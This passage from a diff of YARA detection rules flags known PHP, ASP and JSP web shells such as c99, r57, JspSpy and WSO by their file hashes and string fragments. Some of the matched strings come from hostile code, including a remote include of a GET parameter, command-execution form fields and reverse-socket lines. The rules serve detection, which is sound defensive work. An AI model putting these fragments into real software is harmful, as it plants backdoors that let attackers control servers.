+		$s0 = "response.write(\"<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio"
+		$s2 = "if FP = \"RefreshFolder\" or request.form(\"cmdOption\")=\"DeleteFolder\" or req"
+	condition:
+		all of them
+}
+rule webshell_PHP_bug_1_ {
+	meta:
+		description = "Web Shell - file bug (1).php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "91c5fae02ab16d51fc5af9354ac2f015"
+	strings:
+		$s0 = "@include($_GET['bug']);" fullword
+	condition:
+		all of them
+}
+rule webshell_caidao_shell_hkmjj {
+	meta:
+		description = "Web Shell - file hkmjj.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "e7b994fe9f878154ca18b7cde91ad2d0"
+	strings:
+		$s6 = "codeds=\"Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\"  " fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_asd {
+	meta:
+		description = "Web Shell - file asd.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a042c2ca64176410236fcc97484ec599"
+	strings:
+		$s3 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%>" fullword
+		$s6 = "<input size=\"100\" value=\"<%=application.getRealPath(\"/\") %>\" name=\"url"
+	condition:
+		all of them
+}
+rule webshell_jsp_inback3 {
+	meta:
+		description = "Web Shell - file inback3.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ea5612492780a26b8aa7e5cedd9b8f4e"
+	strings:
+		$s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"
+	condition:
+		all of them
+}
+rule webshell_metaslsoft {
+	meta:
+		description = "Web Shell - file metaslsoft.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "aa328ed1476f4a10c0bcc2dde4461789"
+	strings:
+		$s7 = "$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>LINK</t"
+	condition:
+		all of them
+}
+rule webshell_asp_Ajan {
+	meta:
+		description = "Web Shell - file Ajan.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b6f468252407efc2318639da22b08af0"
+	strings:
+		$s3 = "entrika.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreate"
+	condition:
+		all of them
+}
+rule webshell_config_myxx_zend {
+	meta:
+		description = "Web Shell - from files config.jsp, myxx.jsp, zend.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash1 = "e0354099bee243702eb11df8d0e046df"
+		hash2 = "591ca89a25f06cf01e4345f98a22845c"
+	strings:
+		$s3 = ".println(\"<a href=\\\"javascript:alert('You Are In File Now ! Can Not Pack !');"
+	condition:
+		all of them
+}
+rule webshell_browser_201_3_ma_download {
+	meta:
+		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, download.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash4 = "fa87bbd7201021c1aefee6fcc5b8e25a"
+	strings:
+		$s2 = "<small>jsp File Browser version <%= VERSION_NR%> by <a"
+		$s3 = "else if (fName.endsWith(\".mpg\") || fName.endsWith(\".mpeg\") || fName.endsWith"
+	condition:
+		all of them
+}
+rule webshell_itsec_itsecteam_shell_jHn {
+	meta:
+		description = "Web Shell - from files itsec.php, itsecteam_shell.php, jHn.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "8ae9d2b50dc382f0571cd7492f079836"
+		hash1 = "bd6d3b2763c705a01cc2b3f105a25fa4"
+		hash2 = "40c6ecf77253e805ace85f119fe1cebb"
+	strings:
+		$s4 = "echo $head.\"<font face='Tahoma' size='2'>Operating System : \".php_uname().\"<b"
+		$s5 = "echo \"<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'"
+	condition:
+		all of them
+}
+rule webshell_ghost_source_icesword_silic {
+	meta:
+		description = "Web Shell - from files ghost_source.php, icesword.php, silic.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "cbf64a56306c1b5d98898468fc1fdbd8"
+		hash1 = "6e20b41c040efb453d57780025a292ae"
+		hash2 = "437d30c94f8eef92dc2f064de4998695"
+	strings:
+		$s3 = "if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $"
+		$s6 = "if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST["
+	condition:
+		all of them
+}
+rule webshell_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_spy2009_m_ma3_xxx {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash4 = "8b457934da3821ba58b06a113e0d53d9"
+		hash5 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash6 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash7 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash8 = "d71716df5042880ef84427acee8b121e"
+		hash9 = "341298482cf90febebb8616426080d1d"
+		hash10 = "29aebe333d6332f0ebc2258def94d57e"
+		hash11 = "42654af68e5d4ea217e6ece5389eb302"
+		hash12 = "88fc87e7c58249a398efd5ceae636073"
+		hash13 = "4a812678308475c64132a9b56254edbc"
+		hash14 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash15 = "344f9073576a066142b2023629539ebd"
+		hash16 = "32dea47d9c13f9000c4c807561341bee"
+		hash17 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash18 = "655722eaa6c646437c8ae93daac46ae0"
+		hash19 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash20 = "9c94637f76e68487fa33f7b0030dd932"
+		hash21 = "6acc82544be056580c3a1caaa4999956"
+		hash22 = "6aa32a6392840e161a018f3907a86968"
+		hash23 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash24 = "3ea688e3439a1f56b16694667938316d"
+		hash25 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash26 = "71097537a91fac6b01f46f66ee2d7749"
+		hash27 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash28 = "7a4b090619ecce6f7bd838fe5c58554b"
+	strings:
+		$s8 = "\"<form action=\\\"\"+SHELL_NAME+\"?o=upload\\\" method=\\\"POST\\\" enctype="
+		$s9 = "<option value='reg query \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\T"
+	condition:
+		all of them
+}
+rule webshell_2_520_job_ma1_ma4_2 {
+	meta:
+		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "56c005690da2558690c4aa305a31ad37"
+		hash3 = "532b93e02cddfbb548ce5938fe2f5559"
+		hash4 = "6e0fa491d620d4af4b67bae9162844ae"
+		hash5 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
+	strings:
+		$s4 = "_url = \"jdbc:microsoft:sqlserver://\" + dbServer + \":\" + dbPort + \";User=\" "
+		$s9 = "result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getR"
+	condition:
+		all of them
+}
+rule webshell_000_403_807_a_c5_config_css_dm_he1p_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_xxx {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash4 = "8b457934da3821ba58b06a113e0d53d9"
+		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash7 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash8 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash9 = "d71716df5042880ef84427acee8b121e"
+		hash10 = "341298482cf90febebb8616426080d1d"
+		hash11 = "29aebe333d6332f0ebc2258def94d57e"
+		hash12 = "42654af68e5d4ea217e6ece5389eb302"
+		hash13 = "88fc87e7c58249a398efd5ceae636073"
+		hash14 = "4a812678308475c64132a9b56254edbc"
+		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash16 = "e0354099bee243702eb11df8d0e046df"
+		hash17 = "344f9073576a066142b2023629539ebd"
+		hash18 = "32dea47d9c13f9000c4c807561341bee"
+		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash20 = "655722eaa6c646437c8ae93daac46ae0"
+		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash22 = "9c94637f76e68487fa33f7b0030dd932"
+		hash23 = "6acc82544be056580c3a1caaa4999956"
+		hash24 = "6aa32a6392840e161a018f3907a86968"
+		hash25 = "591ca89a25f06cf01e4345f98a22845c"
+		hash26 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash27 = "3ea688e3439a1f56b16694667938316d"
+		hash28 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash29 = "71097537a91fac6b01f46f66ee2d7749"
+		hash30 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash31 = "7a4b090619ecce6f7bd838fe5c58554b"
+	strings:
+		$s0 = "ports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";" fullword
+		$s1 = "private static class VEditPropertyInvoker extends DefaultInvoker {" fullword
+	condition:
+		all of them
+}
+rule webshell_wso2_5_1_wso2_5_wso2 {
+	meta:
+		description = "Web Shell - from files wso2.5.1.php, wso2.5.php, wso2.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "dbeecd555a2ef80615f0894027ad75dc"
+		hash1 = "7c8e5d31aad28eb1f0a9a53145551e05"
+		hash2 = "cbc44fb78220958f81b739b493024688"
+	strings:
+		$s7 = "$opt_charsets .= '<option value=\"'.$item.'\" '.($_POST['charset']==$item?'selec"
+		$s8 = ".'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode($f['na"
+	condition:
+		all of them
+}
+rule webshell_000_403_c5_queryDong_spyjsp2010_t00ls {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp, t00ls.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "8b457934da3821ba58b06a113e0d53d9"
+		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash4 = "655722eaa6c646437c8ae93daac46ae0"
+		hash5 = "9c94637f76e68487fa33f7b0030dd932"
+	strings:
+		$s8 = "table.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbName+\"')"
+		$s9 = "\"<p><input type=\\\"hidden\\\" name=\\\"selectDb\\\" value=\\\"\"+selectDb+\""
+	condition:
+		all of them
+}
+rule webshell_404_data_suiyue {
+	meta:
+		description = "Web Shell - from files 404.jsp, data.jsp, suiyue.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "7066f4469c3ec20f4890535b5f299122"
+		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+		hash2 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
+	strings:
+		$s3 = " sbCopy.append(\"<input type=button name=goback value=' \"+strBack[languageNo]+"
+	condition:
+		all of them
+}
+rule webshell_r57shell_r57shell127_SnIpEr_SA_Shell_EgY_SpIdEr_ShElL_V2_r57_xxx {
+	meta:
+		description = "Web Shell - from files r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "ef43fef943e9df90ddb6257950b3538f"
+		hash1 = "ae025c886fbe7f9ed159f49593674832"
+		hash2 = "911195a9b7c010f61b66439d9048f400"
+		hash3 = "697dae78c040150daff7db751fc0c03c"
+		hash4 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash5 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash6 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+		hash7 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash8 = "41af6fd253648885c7ad2ed524e0692d"
+		hash9 = "6fcc283470465eed4870bcc3e2d7f14d"
+	strings:
+		$s2 = "echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_name"
+		$s3 = "echo sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1"
+		$s9 = "echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size="
+	condition:
+		all of them
+}
+rule webshell_807_a_css_dm_he1p_JspSpy_xxx {
+	meta:
+		description = "Web Shell - from files 807.jsp, a.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, style.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash1 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash2 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash3 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash4 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash5 = "d71716df5042880ef84427acee8b121e"
+		hash6 = "341298482cf90febebb8616426080d1d"
+		hash7 = "29aebe333d6332f0ebc2258def94d57e"
+		hash8 = "42654af68e5d4ea217e6ece5389eb302"
+		hash9 = "88fc87e7c58249a398efd5ceae636073"
+		hash10 = "4a812678308475c64132a9b56254edbc"
+		hash11 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash12 = "344f9073576a066142b2023629539ebd"
+		hash13 = "32dea47d9c13f9000c4c807561341bee"
+		hash14 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash15 = "6acc82544be056580c3a1caaa4999956"
+		hash16 = "6aa32a6392840e161a018f3907a86968"
+		hash17 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash18 = "3ea688e3439a1f56b16694667938316d"
+		hash19 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash20 = "71097537a91fac6b01f46f66ee2d7749"
+		hash21 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash22 = "7a4b090619ecce6f7bd838fe5c58554b"
+	strings:
+		$s1 = "\"<h2>Remote Control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var"
+		$s2 = "\"<p>Current File (import new file name and new file)<br /><input class=\\\"inpu"
+		$s3 = "\"<p>Current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i"
+	condition:
+		all of them
+}
+rule webshell_201_3_ma_download {
+	meta:
+		description = "Web Shell - from files 201.jsp, 3.jsp, ma.jsp, download.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash1 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash2 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash3 = "fa87bbd7201021c1aefee6fcc5b8e25a"
+	strings:
+		$s0 = "<input title=\"Upload selected file to the current working directory\" type=\"Su"
+		$s5 = "<input title=\"Launch command in current directory\" type=\"Submit\" class=\"but"
+		$s6 = "<input title=\"Delete all selected files and directories incl. subdirs\" class="
+	condition:
+		all of them
+}
+rule webshell_browser_201_3_400_in_JFolder_jfolder01_jsp_leo_ma_warn_webshell_nc_download {
+	meta:
+		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, ma.jsp, warn.jsp, webshell-nc.jsp, download.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash3 = "36331f2c81bad763528d0ae00edf55be"
+		hash4 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash5 = "8979594423b68489024447474d113894"
+		hash6 = "ec482fc969d182e5440521c913bab9bd"
+		hash7 = "f98d2b33cd777e160d1489afed96de39"
+		hash8 = "4b4c12b3002fad88ca6346a873855209"
+		hash9 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash10 = "e9a5280f77537e23da2545306f6a19ad"
+		hash11 = "598eef7544935cf2139d1eada4375bb5"
+		hash12 = "fa87bbd7201021c1aefee6fcc5b8e25a"
+	strings:
+		$s4 = "UplInfo info = UploadMonitor.getInfo(fi.clientFileName);" fullword
+		$s5 = "long time = (System.currentTimeMillis() - starttime) / 1000l;" fullword
+	condition:
+		all of them
+}
+rule webshell_shell_phpspy_2006_arabicspy {
+	meta:
+		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "40a1f840111996ff7200d18968e42cfe"
+		hash2 = "e0202adff532b28ef1ba206cf95962f2"
+	strings:
+		$s0 = "elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype"
+		$s8 = "echo \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"P"
+	condition:
+		all of them
+}
+rule webshell_in_JFolder_jfolder01_jsp_leo_warn {
+	meta:
+		description = "Web Shell - from files in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash1 = "8979594423b68489024447474d113894"
+		hash2 = "ec482fc969d182e5440521c913bab9bd"
+		hash3 = "f98d2b33cd777e160d1489afed96de39"
+		hash4 = "4b4c12b3002fad88ca6346a873855209"
+		hash5 = "e9a5280f77537e23da2545306f6a19ad"
+	strings:
+		$s4 = "sbFile.append(\"  &nbsp;<a href=\\\"javascript:doForm('down','\"+formatPath(strD"
+		$s9 = "sbFile.append(\" &nbsp;<a href=\\\"javascript:doForm('edit','\"+formatPath(strDi"
+	condition:
+		all of them
+}
+rule webshell_2_520_icesword_job_ma1_ma4_2 {
+	meta:
+		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
+		hash3 = "56c005690da2558690c4aa305a31ad37"
+		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
+		hash5 = "6e0fa491d620d4af4b67bae9162844ae"
+		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
+	strings:
+		$s2 = "private String[] _textFileTypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\","
+		$s3 = "\\\" name=\\\"upFile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typ"
+		$s9 = "if (request.getParameter(\"password\") == null && session.getAttribute(\"passwor"
+	condition:
+		all of them
+}
+rule webshell_phpspy_2005_full_phpspy_2005_lite_PHPSPY {
+	meta:
+		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash1 = "42f211cec8032eb0881e87ebdb3d7224"
+		hash2 = "0712e3dc262b4e1f98ed25760b206836"
+	strings:
+		$s6 = "<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['comma"
+		$s7 = "echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_FILE"
+		$s8 = "<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; "
+	condition:
+		2 of them
+}
+rule webshell_shell_phpspy_2006_arabicspy_hkrkoz {
+	meta:
+		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "40a1f840111996ff7200d18968e42cfe"
+		hash2 = "e0202adff532b28ef1ba206cf95962f2"
+		hash3 = "802f5cae46d394b297482fd0c27cb2fc"
+	strings:
+		$s5 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
+	condition:
+		all of them
+}
+rule webshell_c99_Shell_ci_Biz_was_here_c100_v_xxx {
+	meta:
+		description = "Web Shell - from files c99.php, Shell [ci] .Biz was here.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c66.php, c99-shadows-mod.php, c99shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "f2fa878de03732fbf5c86d656467ff50"
+		hash2 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+		hash3 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+		hash4 = "68c0629d08b1664f5bcce7d7f5f71d22"
+		hash5 = "048ccc01b873b40d57ce25a4c56ea717"
+	strings:
+		$s8 = "else {echo \"Running datapipe... ok! Connect to <b>\".getenv(\"SERVER_ADDR\""
+	condition:
+		all of them
+}
+rule webshell_2008_2009lite_2009mssql {
+	meta:
+		description = "Web Shell - from files 2008.php, 2009lite.php, 2009mssql.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
+		hash1 = "3f4d454d27ecc0013e783ed921eeecde"
+		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
+	strings:
+		$s0 = "<a href=\"javascript:godir(\\''.$drive->Path.'/\\');"
+		$s7 = "p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all"
+	condition:
+		all of them
+}
+rule webshell_shell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_arabicspy_PHPSPY_hkrkoz {
+	meta:
+		description = "Web Shell - from files shell.php, phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, arabicspy.php, PHPSPY.php, hkrkoz.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash2 = "42f211cec8032eb0881e87ebdb3d7224"
+		hash3 = "40a1f840111996ff7200d18968e42cfe"
+		hash4 = "e0202adff532b28ef1ba206cf95962f2"
+		hash5 = "0712e3dc262b4e1f98ed25760b206836"
+		hash6 = "802f5cae46d394b297482fd0c27cb2fc"
+	strings:
+		$s0 = "$mainpath_info           = explode('/', $mainpath);" fullword
+		$s6 = "if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == \"d"
+	condition:
+		all of them
+}
+rule webshell_807_dm_JspSpyJDK5_m_cofigrue {
+	meta:
+		description = "Web Shell - from files 807.jsp, dm.jsp, JspSpyJDK5.jsp, m.jsp, cofigrue.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash1 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash2 = "341298482cf90febebb8616426080d1d"
+		hash3 = "88fc87e7c58249a398efd5ceae636073"
+		hash4 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+	strings:
+		$s1 = "url_con.setRequestProperty(\"REFERER\", \"\"+fckal+\"\");" fullword
+		$s9 = "FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(),  \"GBK\");" fullword
+	condition:
+		1 of them
+}
+rule webshell_Dive_Shell_1_0_Emperor_Hacking_Team_xxx {
+	meta:
+		description = "Web Shell - from files Dive Shell 1.0 - Emperor Hacking Team.php, phpshell.php, SimShell 1.0 - Simorgh Security MGZ.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "1b5102bdc41a7bc439eea8f0010310a5"
+		hash1 = "f8a6d5306fb37414c5c772315a27832f"
+		hash2 = "37cb1db26b1b0161a4bf678a6b4565bd"
+	strings:
+		$s1 = "if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals"
+		$s9 = "if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {" fullword
+	condition:
+		all of them
+}
+rule webshell_404_data_in_JFolder_jfolder01_xxx {
+	meta:
+		description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, suiyue.jsp, warn.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "7066f4469c3ec20f4890535b5f299122"
+		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash3 = "8979594423b68489024447474d113894"
+		hash4 = "ec482fc969d182e5440521c913bab9bd"
+		hash5 = "f98d2b33cd777e160d1489afed96de39"
+		hash6 = "4b4c12b3002fad88ca6346a873855209"
+		hash7 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
+		hash8 = "e9a5280f77537e23da2545306f6a19ad"
+	strings:
+		$s4 = "&nbsp;<TEXTAREA NAME=\"cqq\" ROWS=\"20\" COLS=\"100%\"><%=sbCmd.toString()%></TE"
+	condition:
+		all of them
+}
+rule webshell_jsp_reverse_jsp_reverse_jspbd {
+	meta:
+		description = "Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		super_rule = 1
+		hash0 = "8b0e6779f25a17f0ffb3df14122ba594"
+		hash1 = "ea87f0c1f0535610becadf5a98aca2fc"
+		hash2 = "7d5e9732766cf5b8edca9b7ae2b6028f"
+		score = 50
+	strings:
+		$s0 = "osw = new BufferedWriter(new OutputStreamWriter(os));" fullword
+		$s7 = "sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());" fullword
+		$s9 = "isr = new BufferedReader(new InputStreamReader(is));" fullword
+	condition:
+		all of them
+}
+rule webshell_400_in_JFolder_jfolder01_jsp_leo_warn_webshell_nc {
+	meta:
+		description = "Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
